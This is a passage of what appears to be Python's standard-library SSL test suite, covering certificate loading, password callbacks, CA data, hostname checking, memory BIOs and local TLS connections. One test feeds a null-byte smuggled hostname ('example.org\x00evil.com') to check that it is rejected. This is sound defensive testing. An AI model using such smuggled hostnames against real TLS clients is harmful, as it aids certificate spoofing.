ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
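# Instead of a literal password, load_cert_chain() also accepts a callable.
# As exercised below, the callable must return a str, bytes or bytearray no
# longer than OpenSSL's password buffer, and it is only invoked when the key
# actually needs decrypting (the unencrypted-CERTFILE case at the end).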
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
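# cadata accepts either a str of concatenated PEM certificates or a bytes
# object of DER certificates; certificates already present in the store are
# not added twice, which is what the x509_ca counters below verify.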
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(
ssl.SSLError,
"no start line: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(
ssl.SSLError,
"not enough data: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
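# session_stats() exposes the context's session-cache counters (these map to
# OpenSSL's per-context SSL_CTX_sess_* statistics); a fresh context reports
# all zeros.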
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "test only applies to non-Windows platforms")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(), server_side=True)
self.assertIsInstance(obj, MySSLObject)
def test_num_tickets(self):
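# num_tickets controls how many TLS 1.3 session tickets a server-side context
# sends after the handshake; the default is 2, and only PROTOCOL_TLS_SERVER
# contexts allow changing it (hence the ValueError for the client context below).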
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For backwards compatibility, the exception's errno carries the SSL error code
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
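# eof only becomes True once write_eof() has been called *and* all buffered
# data has been drained by read(); until then pending bytes keep eof False.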
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
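# (A capath directory holds certificates under hash-based names such as
# <hash>.0; roughly, `openssl rehash` / `c_rehash` generate them, and the old
# and new subject-hash algorithms produce different file names for the same cert.)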
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
